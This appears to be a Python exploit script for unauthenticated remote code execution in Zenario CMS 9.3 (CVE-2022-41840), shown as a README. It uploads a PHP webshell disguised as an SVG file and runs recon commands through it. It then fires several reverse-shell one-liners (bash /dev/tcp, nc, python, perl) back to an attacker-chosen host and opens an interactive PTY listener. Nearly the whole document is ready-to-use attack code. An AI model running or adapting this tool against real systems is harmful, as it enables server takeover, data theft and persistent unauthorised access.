README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Zenario CMS 9.3 - Unauthenticated RCE Exploit (CVE-2022-41840)
Upload endpoint (confirmed from PoC):
POST /zenario/ajax.php?method_call=handlePluginAJAX&cID=1&slideId=0&cType=html&instanceId=20&fileUpload
Field : fileUpload | MIME: image/svg+xml
JSON response: {"files":[{"name":"x.php","path":"private\/uploads\/RAND\/x.php"}]}
Shell: GET /private/uploads/RAND/x.php?cmd=id
Usage:
python3 zenario_exploit.py --target http://10.0.160.54 # interactive webshell
python3 zenario_exploit.py --target http://10.0.160.54 --cmd "id" # single command
python3 zenario_exploit.py --target http://10.0.160.54 --lhost 10.x.x.x --lport 4444 # reverse shell
"""
import requests, argparse, sys, re, time, json, random, string, threading, os, select, tty, termios
from urllib.parse import urljoin
requests.packages.urllib3.disable_warnings()
R="\033[91m"; G="\033[92m"; Y="\033[93m"; B="\033[94m"; C="\033[96m"; W="\033[0m"; BOLD="\033[1m"
def banner():
    """Print the tool's boxed title banner to stdout.

    The box is emitted after the ``C`` and ``BOLD`` terminal escape codes and
    is followed by the ``W`` reset code, so later output is not affected by
    the banner's styling.
    """
    box_rows = (
        "╔══════════════════════════════════════════════════════════════╗",
        "║ Zenario CMS 9.3 - Unauthenticated RCE (CVE-2022-41840) ║",
        "║ Upload → JSON path → Webshell → Reverse PTY Shell ║",
        "╚══════════════════════════════════════════════════════════════╝",
    )
    box = "\n".join(box_rows)
    # Leading newline after the colour codes and trailing newline after the
    # reset code mirror the layout of the original triple-quoted literal.
    print(f"{C}{BOLD}\n{box}{W}\n")
def log(msg, level="info"):
    """Print *msg* to stdout behind a severity tag and flush immediately.

    Args:
        msg: The text (or any object usable in an f-string) to display.
        level: One of ``"info"`` (``[*]``), ``"success"`` (``[+]``),
            ``"warn"`` (``[!]``), ``"error"`` (``[-]``) or ``"cmd"``
            (``[>]``).  Each known level is wrapped in its own colour code
            and terminated with the ``W`` reset code.  Any other value falls
            back to a plain, uncoloured ``[*]``.
    """
    # (colour escape, marker) per known level.
    markers = {
        "info": (B, "[*]"),
        "success": (G, "[+]"),
        "warn": (Y, "[!]"),
        "error": (R, "[-]"),
        "cmd": (C, "[>]"),
    }
    entry = markers.get(level)
    if entry is None:
        prefix = "[*]"
    else:
        colour, marker = entry
        prefix = f"{colour}{marker}{W}"
    print(f"{prefix} {msg}", flush=True)
# ── Webshell: tries multiple exec functions in order ─────────────────────────
# This ensures output even if system() or passthru() are disabled by PHP config
WEBSHELL = b"""<?php
$cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
if($cmd == '') { echo 'SHELL_OK'; exit; }
ob_start();
if(function_exists('system')) { system($cmd); }
elseif(function_exists('passthru')) { passthru($cmd); }
elseif(function_exists('exec')) { echo exec($cmd); }
elseif(function_exists('shell_exec')){ echo shell_exec($cmd); }
elseif(function_exists('popen')) {
$h = popen($cmd, 'r');
while(!feof($h)) { echo fread($h,4096); }
pclose($h);
} else { echo 'NO_EXEC_FUNCTIONS'; }
$out = ob_get_clean();
echo $out;
?>"""
# ── Upload ────────────────────────────────────────────────────────────────────
def upload_shell(session, target, shell_name):
# instanceId cycles from PoC default (20) then common values
instance_ids = [20, 1, 2, 3, 4, 5, 10, 15, 25, 30, 40, 50]
c_ids = [1, 2, 3]
for cid in c_ids:
for iid in instance_ids:
ep = (f"/zenario/ajax.php?method_call=handlePluginAJAX"
f"&cID={cid}&slideId=0&cType=html&instanceId={iid}&fileUpload")
url = urljoin(target, ep)
log(f"Uploading → cID={cid} instanceId={iid}", "info")
try:
r = session.post(
url,
files={"fileUpload": (shell_name, WEBSHELL, "image/svg+xml")},
verify=False, timeout=15
)
log(f"HTTP {r.status_code} | {r.text[:200]}", "info")
if r.status_code == 200 and r.text.strip():
# Primary: parse JSON
try:
data = json.loads(r.text)
flist = data.get("files", [])
if flist:
raw = flist[0].get("path", "")
path = raw.replace("\\/", "/")
log(f"Path from JSON: {path}", "success")
return path
except json.JSONDecodeError:
pass
# Fallback: regex
m = re.search(r'"path"\s*:\s*"([^"]+)"', r.text)
if m:
path = m.group(1).replace("\\/", "/")
log(f"Path from regex: {path}", "success")
return path
except requests.exceptions.ConnectionError:
log("Connection refused — is target up?", "error")
sys.exit(1)
except Exception as e:
log(f"Error: {e}", "warn")
return None
# ── Verify & get shell URL ────────────────────────────────────────────────────
def verify_shell(session, target, shell_path):
if not shell_path.startswith("/"):
shell_path = "/" + shell_path
url = urljoin(target, shell_path)
log(f"Verifying shell → {url}", "info")
try:
r = session.get(url, params={"cmd": "echo SHELL_TEST_OK"}, verify=False, timeout=10)
log(f"Response body: [{r.text[:300]}]", "info") # show raw so we can debug
if "SHELL_TEST_OK" in r.text:
log("RCE confirmed — output received!", "success")
return url
elif "SHELL_OK" in r.text:
log("Shell reachable but exec functions may be restricted — trying anyway", "warn")
return url
elif "NO_EXEC_FUNCTIONS" in r.text:
log("Shell uploaded but all exec functions are disabled on this server!", "error")
return url # still return, user may want to try other things
elif r.status_code == 200:
log(f"Shell reachable (200) but got unexpected body. Raw: {r.text[:200]}", "warn")
return url
else:
log(f"HTTP {r.status_code} — shell may not be accessible", "warn")
except Exception as e:
log(f"Verify error: {e}", "warn")
return None
# ── Execute a command via webshell ────────────────────────────────────────────
def exec_cmd(session, shell_url, cmd):
try:
r = session.get(shell_url, params={"cmd": cmd}, verify=False, timeout=20)
return r.text.strip()
except Exception as e:
return f"[Error: {e}]"
# ── Reverse shell payloads ────────────────────────────────────────────────────
def get_reverse_payloads(lhost, lport):
return [
# Most reliable on Linux
f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
# mkfifo (works when bash tcp redirection is blocked)
f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {lhost} {lport} >/tmp/f",
# Python3
f"python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),i) for i in range(3)];subprocess.call([\"/bin/bash\",\"-i\"])'",
# Python2 fallback
f"python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),i) for i in range(3)];subprocess.call([\"/bin/bash\",\"-i\"])'",
# Perl
f"perl -e 'use Socket;$i=\"{lhost}\";$p={lport};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");'",
# nc with -e
f"nc -e /bin/bash {lhost} {lport}",
# nc without -e (OpenBSD nc)
f"nc {lhost} {lport} | /bin/bash | nc {lhost} {lport}",
]
def trigger_reverse_shell(session, shell_url, lhost, lport):
payloads = get_reverse_payloads(lhost, lport)
log(f"Trying {len(payloads)} reverse shell payloads → {lhost}:{lport}", "info")
for i, payload in enumerate(payloads, 1):
log(f"[{i}/{len(payloads)}] {payload[:80]}...", "cmd")
try:
session.get(shell_url, params={"cmd": payload}, verify=False, timeout=4)
except Exception:
pass # timeout is expected when shell connects back
time.sleep(2)
# ── PTY listener (fully interactive) ─────────────────────────────────────────
def pty_listener(lport):
"""
Proper PTY-aware listener. Sets your terminal to raw mode so you get
a fully interactive shell (arrow keys, tab completion, Ctrl+C all work).
Automatically sends the PTY upgrade sequence on connect.
"""
import socket as _socket
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
s.setsockopt(_socket.SOL_SOCKET, _socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", lport))
s.listen(1)
log(f"Listening on 0.0.0.0:{lport} (PTY mode) ...", "success")
log(f"Waiting for connection...", "info")
conn, addr = s.accept()
log(f"Got shell from {addr[0]}:{addr[1]}", "success")
s.close()
# Send PTY upgrade so we get a proper interactive shell
pty_upgrade = (
"python3 -c 'import pty;pty.spawn(\"/bin/bash\")' || "
"python -c 'import pty;pty.spawn(\"/bin/bash\")' || "
"script -q /dev/null /bin/bash\n"
)
conn.send(pty_upgrade.encode())
time.sleep(0.5)
# Send stty to fix terminal size
rows, cols = os.popen("stty size", "r").read().split() if os.popen("stty size", "r").read() else ("24", "80")
conn.send(f"stty rows {rows} cols {cols}\n".encode())
time.sleep(0.3)
conn.send(b"export TERM=xterm\n")
time.sleep(0.3)
log(f"{G}Shell upgraded! You have a PTY. Ctrl+C to kill.{W}", "success")
# Save old terminal settings and switch to raw mode
old_settings = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
conn.setblocking(False)
while True:
r, _, _ = select.select([conn, sys.stdin], [], [], 0.1)
if conn in r:
try:
data = conn.recv(4096)
if not data:
break
sys.stdout.buffer.write(data)
sys.stdout.buffer.flush()
except Exception:
break
if sys.stdin in r:
ch = sys.stdin.buffer.read(1)
if not ch:
break
conn.send(ch)
except Exception:
pass
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings)
conn.close()
print(f"\n{Y}[!] Connection closed.{W}")
# ── Interactive webshell (fallback if reverse shell isn't needed) ─────────────
def interactive_webshell(session, shell_url):
log(f"{G}Webshell active. Type 'exit' to quit.{W}", "success")
print(f"{Y} URL → {shell_url}{W}")
print(f"{Y} Tip → type 'revshell <lhost> <lport>' to get a reverse PTY shell{W}\n")
while True:
try:
cmd = input(f"{C}webshell$ {W}").strip()
except (EOFError, KeyboardInterrupt):
print()
break
if not cmd:
continue
if cmd.lower() in ("exit", "quit"):
break
if cmd.startswith("revshell "):
parts = cmd.split()
if len(parts) == 3:
lhost, lport = parts[1], int(parts[2])
log(f"Starting PTY listener on :{lport} then triggering shell...", "info")
t = threading.Thread(target=pty_listener, args=(lport,), daemon=True)
t.start()
time.sleep(0.5)
trigger_reverse_shell(session, shell_url, lhost, lport)
t.join()
else:
log("Usage: revshell <lhost> <lport>", "warn")
continue
out = exec_cmd(session, shell_url, cmd)
if out:
print(out)
else:
print(f"{Y}(no output){W}")
# ── Main ──────────────────────────────────────────────────────────────────────
def main():
banner()
p = argparse.ArgumentParser(description="Zenario 9.3 Unauth RCE")
p.add_argument("--target", required=True, help="Target e.g. http://10.0.160.54")
p.add_argument("--lhost", help="Your IP for reverse shell")
p.add_argument("--lport", type=int, default=4444, help="Listener port (default: 4444)")
p.add_argument("--cmd", help="Single command to run and exit")
p.add_argument("--shell", help="Skip upload; use existing shell URL")
args = p.parse_args()
target = args.target.rstrip("/")
session = requests.Session()
session.headers["User-Agent"] = "Mozilla/5.0"
shell_url = args.shell
# ── Phase 1: Upload ───────────────────────────────────────────────────────
if not shell_url:
name = ''.join(random.choices(string.ascii_lowercase, k=7)) + ".php"
log(f"Target : {target}", "info")
log(f"Shell name : {name}", "info")
print()
path = upload_shell(session, target, name)
if not path:
log("Upload failed on all endpoints.", "error")
log("Hint: check the target's page source for instanceId=N in plugin URLs", "warn")
sys.exit(1)
print()
# ── Phase 2: Verify ───────────────────────────────────────────────────
shell_url = verify_shell(session, target, path)
if not shell_url:
log("Shell not reachable — check path manually", "error")
sys.exit(1)
print()
# ── Phase 3: Recon ────────────────────────────────────────────────────────
log("Recon:", "info")
for label, cmd in [
("id ", "id"),
("whoami ", "whoami"),
("hostname", "hostname"),
("uname ", "uname -a"),
("cwd ", "pwd"),
]:
out = exec_cmd(session, shell_url, cmd)
log(f" {label} → {G}{out if out else '(no output)'}{W}", "success")
print()
# ── Phase 4: Shell ────────────────────────────────────────────────────────
if args.cmd:
out = exec_cmd(session, shell_url, args.cmd)
print(f"\n{G}{out}{W}\n")
elif args.lhost:
log("Starting PTY listener then triggering reverse shell...", "info")
t = threading.Thread(target=pty_listener, args=(args.lport,), daemon=True)
t.start()
time.sleep(0.5)
trigger_reverse_shell(session, shell_url, args.lhost, args.lport)
t.join()
else:
interactive_webshell(session, shell_url)
if __name__ == "__main__":
main()